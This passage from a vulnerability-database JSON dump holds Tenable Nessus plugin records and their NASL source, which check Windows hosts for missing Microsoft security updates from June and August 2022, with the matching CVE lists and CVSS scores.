tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016683: Windows Server 2012 R2 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-33670", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35793", "CVE-2022-35795", "CVE-2022-35820"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016683.NASL", "href": "https://www.tenable.com/plugins/nessus/163947", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163947);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30144\",\n \"CVE-2022-30194\",\n \"CVE-2022-33670\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35748\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35793\",\n \"CVE-2022-35795\",\n \"CVE-2022-35820\"\n );\n script_xref(name:\"MSKB\", value:\"5016681\");\n script_xref(name:\"MSKB\", value:\"5016683\");\n script_xref(name:\"MSFT\", value:\"MS22-5016681\");\n script_xref(name:\"MSFT\", value:\"MS22-5016683\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016683: Windows Server 2012 R2 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016683. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016681\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016683\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016681\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016683\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016683 or Cumulative Update 5016681\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016683',\n '5016681'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016683, 5016681])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:27:16", "description": "The remote Windows host is missing security update 5016639. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016639: Windows 10 LTS 1507 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-33670", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35793", "CVE-2022-35795"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016639.NASL", "href": "https://www.tenable.com/plugins/nessus/163941", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163941);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30144\",\n \"CVE-2022-30194\",\n \"CVE-2022-33670\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34703\",\n \"CVE-2022-34704\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34709\",\n \"CVE-2022-34710\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35771\",\n \"CVE-2022-35793\",\n \"CVE-2022-35795\"\n );\n script_xref(name:\"MSKB\", value:\"5016639\");\n script_xref(name:\"MSFT\", value:\"MS22-5016639\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016639: Windows 10 LTS 1507 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016639. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016639\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016639\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016639\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016639'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016639])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:26:01", "description": "The remote Windows host is missing security update 5016622. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016622: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-33670", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35762", "CVE-2022-35763", "CVE-2022-35764", "CVE-2022-35765", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35792", "CVE-2022-35793", "CVE-2022-35795"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016622.NASL", "href": "https://www.tenable.com/plugins/nessus/163940", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163940);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30144\",\n \"CVE-2022-30194\",\n \"CVE-2022-33670\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34699\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34703\",\n \"CVE-2022-34704\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34709\",\n \"CVE-2022-34710\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35748\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35761\",\n \"CVE-2022-35762\",\n \"CVE-2022-35763\",\n \"CVE-2022-35764\",\n \"CVE-2022-35765\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35771\",\n \"CVE-2022-35792\",\n \"CVE-2022-35793\",\n \"CVE-2022-35795\"\n );\n script_xref(name:\"MSKB\", value:\"5016622\");\n script_xref(name:\"MSFT\", value:\"MS22-5016622\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016622: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016622. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016622\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016622\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016622\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016622'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:14393,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016622])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-16T17:49:06", "description": "The remote Windows host is missing security update 5014743. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Local Security Authority Subsystem Service Elevation of Privilege Vulnerability (CVE-2022-30166)\n\n - Windows Advanced Local Procedure Call Elevation of Privilege Vulnerability (CVE-2022-30160)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014743: Windows Server 2008 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30143", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30149", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014743.NASL", "href": "https://www.tenable.com/plugins/nessus/162193", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162193);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30143\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30149\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014743\");\n script_xref(name:\"MSKB\", value:\"5014752\");\n script_xref(name:\"MSFT\", value:\"MS22-5014743\");\n script_xref(name:\"MSFT\", value:\"MS22-5014752\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014743: Windows Server 2008 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014743. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141,\n CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Local Security Authority Subsystem Service Elevation of Privilege Vulnerability (CVE-2022-30166)\n\n - Windows Advanced Local Procedure Call Elevation of Privilege Vulnerability (CVE-2022-30160)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014743\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014752\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014743 or Cumulative Update 5014752\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30161\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 